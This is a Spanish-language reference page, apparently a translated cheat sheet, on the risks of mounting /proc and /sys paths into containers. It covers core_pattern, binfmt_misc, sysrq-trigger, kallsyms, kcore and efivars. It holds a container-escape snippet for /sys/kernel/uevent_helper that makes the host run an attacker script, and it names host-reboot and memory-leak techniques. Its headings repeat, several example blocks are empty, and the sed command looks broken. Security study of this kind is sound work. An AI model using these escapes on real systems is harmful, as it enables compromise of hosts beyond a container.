Sensitive Mounts
La exposición de /proc y /sys sin un aislamiento de espacio de nombres adecuado introduce riesgos de seguridad significativos, incluida la ampliación de la superficie de ataque y la divulgación de información. Estos directorios contienen archivos sensibles que, si están mal configurados o son accedidos por un usuario no autorizado, pueden llevar a la fuga del contenedor, modificación del host o proporcionar información que facilite ataques adicionales. Por ejemplo, montar incorrectamente -v /proc:/host/proc puede eludir la protección de AppArmor debido a su naturaleza basada en la ruta, dejando /host/proc desprotegido.
Puedes encontrar más detalles de cada vulnerabilidad potencial en https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts.
Vulnerabilidades de procfs
/proc/sys
/proc/sysEste directorio permite el acceso para modificar variables del kernel, generalmente a través de sysctl(2), y contiene varios subdirectorios de interés:
/proc/sys/kernel/core_pattern
/proc/sys/kernel/core_patternDescrito en core(5).
Permite definir un programa para ejecutar en la generación de archivos core con los primeros 128 bytes como argumentos. Esto puede llevar a la ejecución de código si el archivo comienza con un pipe
|.Ejemplo de Prueba y Explotación:
/proc/sys/kernel/modprobe
/proc/sys/kernel/modprobeDetallado en proc(5).
Contiene la ruta al cargador de módulos del kernel, invocado para cargar módulos del kernel.
Ejemplo de Verificación de Acceso:
/proc/sys/vm/panic_on_oom
/proc/sys/vm/panic_on_oomReferenciado en proc(5).
Una bandera global que controla si el kernel entra en pánico o invoca al OOM killer cuando ocurre una condición de OOM.
/proc/sys/fs
/proc/sys/fsSegún proc(5), contiene opciones e información sobre el sistema de archivos.
El acceso de escritura puede habilitar varios ataques de denegación de servicio contra el host.
/proc/sys/fs/binfmt_misc
/proc/sys/fs/binfmt_miscPermite registrar intérpretes para formatos binarios no nativos basados en su número mágico.
Puede llevar a la escalada de privilegios o acceso a shell de root si
/proc/sys/fs/binfmt_misc/registeres escribible.Explicación y explotación relevante:
Tutorial detallado: Enlace al video
Otros en /proc
/proc/proc/config.gz
/proc/config.gzPuede revelar la configuración del kernel si
CONFIG_IKCONFIG_PROCestá habilitado.Útil para que los atacantes identifiquen vulnerabilidades en el kernel en ejecución.
/proc/sysrq-trigger
/proc/sysrq-triggerPermite invocar comandos Sysrq, potencialmente causando reinicios inmediatos del sistema u otras acciones críticas.
Ejemplo de Reinicio del Host:
/proc/kmsg
/proc/kmsgExpone mensajes del búfer de anillo del kernel.
Puede ayudar en exploits del kernel, fugas de direcciones y proporcionar información sensible del sistema.
/proc/kallsyms
/proc/kallsymsEnumera símbolos exportados del kernel y sus direcciones.
Esencial para el desarrollo de exploits del kernel, especialmente para superar KASLR.
La información de direcciones está restringida con
kptr_restrictestablecido en1o2.Detalles en proc(5).
/proc/[pid]/mem
/proc/[pid]/memInteractúa con el dispositivo de memoria del kernel
/dev/mem.Históricamente vulnerable a ataques de escalada de privilegios.
Más en proc(5).
/proc/kcore
/proc/kcoreRepresenta la memoria física del sistema en formato core ELF.
La lectura puede filtrar el contenido de la memoria del host y de otros contenedores.
Un tamaño de archivo grande puede provocar problemas de lectura o bloqueos de software.
Uso detallado en Volcado de /proc/kcore en 2019.
/proc/kmem
/proc/kmemInterfaz alternativa para
/dev/kmem, que representa la memoria virtual del kernel.Permite la lectura y escritura, por lo tanto, la modificación directa de la memoria del kernel.
/proc/mem
/proc/memInterfaz alternativa para
/dev/mem, que representa la memoria física.Permite la lectura y escritura, la modificación de toda la memoria requiere resolver direcciones virtuales a físicas.
/proc/sched_debug
/proc/sched_debugDevuelve información de programación de procesos, eludiendo las protecciones del espacio de nombres PID.
Expone nombres de procesos, IDs e identificadores de cgroup.
/proc/[pid]/mountinfo
/proc/[pid]/mountinfoProporciona información sobre los puntos de montaje en el espacio de nombres de montaje del proceso.
Expone la ubicación del
rootfsdel contenedor o de la imagen.
Vulnerabilidades de /sys
/sys/sys/kernel/uevent_helper
/sys/kernel/uevent_helperUtilizado para manejar los
ueventsde dispositivos del kernel.Escribir en
/sys/kernel/uevent_helperpuede ejecutar scripts arbitrarios al activarueventtriggers.Ejemplo de Explotación: %%%bash
Crea un payload
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
Encuentra la ruta del host desde el montaje de OverlayFS para el contenedor
host_path=$(sed -n 's/.\perdir=([^,]).*/\1/p' /etc/mtab)
Establece uevent_helper al helper malicioso
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
Activa un uevent
echo change > /sys/class/mem/null/uevent
Lee la salida
cat /output %%%
/sys/class/thermal
/sys/class/thermalControla la configuración de temperatura, potencialmente causando ataques DoS o daños físicos.
/sys/kernel/vmcoreinfo
/sys/kernel/vmcoreinfoFiltra direcciones del kernel, comprometiendo potencialmente KASLR.
/sys/kernel/security
/sys/kernel/securityAlberga la interfaz
securityfs, permitiendo la configuración de Módulos de Seguridad de Linux como AppArmor.El acceso podría permitir que un contenedor deshabilite su sistema MAC.
/sys/firmware/efi/vars y /sys/firmware/efi/efivars
/sys/firmware/efi/vars y /sys/firmware/efi/efivarsExpone interfaces para interactuar con variables EFI en la NVRAM.
Una mala configuración o explotación puede llevar a laptops inutilizadas o máquinas host no arrancables.
/sys/kernel/debug
/sys/kernel/debugdebugfsofrece una interfaz de depuración "sin reglas" al kernel.Historial de problemas de seguridad debido a su naturaleza no restringida.
Referencias
Última actualización
